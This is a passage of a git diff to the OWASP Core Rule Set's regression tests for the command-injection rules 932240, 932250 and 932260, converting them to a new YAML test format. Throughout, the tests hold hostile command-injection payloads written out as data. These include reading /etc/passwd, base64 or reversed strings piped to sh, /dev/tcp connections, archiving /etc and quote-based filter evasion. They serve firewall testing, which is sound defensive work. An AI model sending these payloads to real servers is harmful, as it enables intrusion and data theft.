"localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932240] + - test_id: 19 desc: "Detect quote evasion: py''thon" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: | - payload=py''thon -c "print('attack')" - version: "HTTP/1.1" - output: - log_contains: id "932240" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: | + payload=py''thon -c "print('attack')" + version: "HTTP/1.1" + output: + log: + expect_ids: [932240] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index 093f360c7..8cbb89e80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml @@ -1,224 +1,222 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, azurit" - enabled: true - name: "932250.yaml" description: | Tests to trigger or not trigger rule 932250. - commands used must be less than 4 chars - [\s<>&|)] is required after a command to reduce FPs +rule_id: 932250 tests: - - test_title: 932250-1 + - test_id: 1 desc: Negative test for excluded command `tar` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-2 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - # FIXME: 932150 already had this false positive. Fix after rework - # - test_title: 932250-3 - # stages: - # - stage: - # input: - # dest_addr: "127.0.0.1" - # method: "POST" - # port: 80 - # headers: - # User-Agent: "OWASP CRS test agent" - # Host: "localhost" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' - # uri: "/post" - # version: "HTTP/1.1" - # output: - # no_log_contains: id "932250" - - test_title: 932250-4 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932250-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 4 desc: Negative test for excluded command `c99` stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=c99%20-wrapper%20sh,-c,curl%20google.com%20.' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 5 desc: "Positive test: Unix Command Injection - ksh test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=ksh -c "curl google."COM - uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" - version: HTTP/1.0 - output: - log_contains: id "932250" - - test_title: 932250-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=ksh -c "curl google."COM + uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM" + version: HTTP/1.0 + output: + log: + expect_ids: [932250] + - test_id: 6 desc: Arithmetic expansion '$(())' WAF evasion (mid command) stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=%24((7))z%20-wrapper%20sh,-c,curl%20google.com%20." + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 7 desc: "'ls' direct command injection" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20-l%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20-l%20/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 8 desc: "'ls' direct command injection (no flags)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20/etc/passwd" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20/etc/passwd" + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 9 desc: "'ls' direct command injection (no slashes)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ls%20foo%20bar" - version: "HTTP/1.1" - output: - log_contains: id "932250" - - test_title: 932250-10 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ls%20foo%20bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [932250] + - test_id: 10 desc: "'ls' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=kills%20foo%20bar" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-11 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=kills%20foo%20bar" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 11 desc: "FP for 'sh' without word boundary" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?show_comments_cookies_opt_in=true" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-12 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?show_comments_cookies_opt_in=true" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 12 desc: "FP for 'ls' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" - - test_title: 932250-13 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "ocvsgo2tnqtc=ls08e58tnf8b027oo1nr5sv3cc" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] + - test_id: 13 desc: "FP for '7z' without word boundary in cookie header value" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932250" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: "oc_sessionPassphrase=7ZSW6ZeHbe3SpaUje9ThKrPf86%2B6reu1QPtwIXFYhfGTtDUXa99eNn2P2Ve2SqeJAyq%2FXYPi1zuif%2FLRj3da0RUXYlTzizBACJ9HgiNQax72lEFNKajSuHuOeqYvVRgT" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml index 99184896c..d9e377534 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml @@ -1,778 +1,776 @@ --- meta: author: "Paul Beckett, Franziska Bühler, karelorigin, Esad Cetiner, azurit" - enabled: true - name: "932260.yaml" - description: "Tests to trigger or not trigger rule 932260" +rule_id: 932260 tests: - - test_title: 932260-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-2 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-3 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-4 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-5 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=time is of the essence' - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-6 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-7 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?932260-1=bash%20-c%20%22echo%20test%22" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 2 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: "931120-3=exec 5<>/dev/tcp/8.8.8.8/80" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '932260-2=dont match commands that are not at start;tar -xzf /var/www/exfiltrate.tar.gz /etc' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 4 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 5 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=time is of the essence' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 6 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'x=printf%20dwssap/cte/%20tac%20|%20rev%20|%20sh' + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 7 desc: "Unix Command Injection - python version bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=python cmd" - uri: "/get?cmd=python3.10%20cmd" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=python cmd" + uri: "/get?cmd=python3.10%20cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932260] + - test_id: 8 desc: "Unix Command Injection - printf bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" - uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" - version: HTTP/1.0 - output: - log_contains: id "932260" - - test_title: 932260-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=printf dW5hbWUgLWE=|base64 -d|sh" + uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh" + version: HTTP/1.0 + output: + log: + expect_ids: [932260] + - test_id: 9 desc: "Positive test: Data exfiltration with gunzip" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-10 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 10 desc: "Positive test: Data exfiltration with zstdcat" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-11 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 11 desc: "Positive test: Unix Command Injection - busybox test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=busybox -c "echo hi" - uri: "/get?code=busybox%20-c%20%22echo%20hi%22" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=busybox -c "echo hi" + uri: "/get?code=busybox%20-c%20%22echo%20hi%22" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 12 desc: Remote Command Execution bypass with time stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+bsdtar+" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+bsdtar+" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 13 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932260] + - test_id: 14 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932260] + - test_id: 15 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932260] + - test_id: 16 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 17 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-18 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 18 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20x%20for%20y" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-19 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20x%20for%20y" + version: "HTTP/1.1" + output: + log: + no_expect_ids: 